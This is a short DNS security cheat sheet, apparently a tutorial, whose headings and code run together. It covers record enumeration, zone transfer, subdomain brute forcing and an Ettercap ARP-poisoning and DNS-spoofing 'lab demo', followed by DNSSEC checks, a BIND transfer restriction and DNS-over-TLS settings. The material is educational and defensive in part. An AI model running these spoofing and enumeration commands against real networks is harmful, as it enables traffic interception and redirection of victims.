DNS protocol attacks, record enumeration, spoofing/cache poisoning, and protection with DNSSEC.
dig target.com ANY # All record types
dig target.com MX # Mail servers
dig target.com NS # Name servers
dig target.com TXT # SPF, DKIM, DMARC records
# Zone transfer (if misconfigured โ reveals ALL records):
dig axfr @ns1.target.com target.com
# Subdomain brute force:
dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt
fierce --domain target.comAttacker injects forged DNS responses into a resolver cache to redirect traffic to malicious servers.
# Lab demo with Ettercap โ edit /etc/ettercap/etter.dns:
# *.target.com A 192.168.1.100
ettercap -T -q -P dns_spoof -M arp /192.168.1.1// /192.168.1.10//dig +dnssec target.com # Check if DNSSEC is active
dig DS target.com @8.8.8.8 # Check DS record
delv target.com # Verify chain of trust
# "ad" flag in response = authenticated data (DNSSEC active)# BIND โ allow transfer only to secondary NS:
zone "target.com" {
allow-transfer { 192.168.1.2; };
};# /etc/systemd/resolved.conf:
DNS=1.1.1.1 1.0.0.1
DNSOverTLS=yes| Record | Purpose |
|---|---|
| SPF | Defines authorised mail servers for the domain |
| DKIM | Cryptographic signature for outgoing emails |
| DMARC | SPF+DKIM alignment policy and reporting |
| CAA | Limits which CAs can issue certificates for the domain |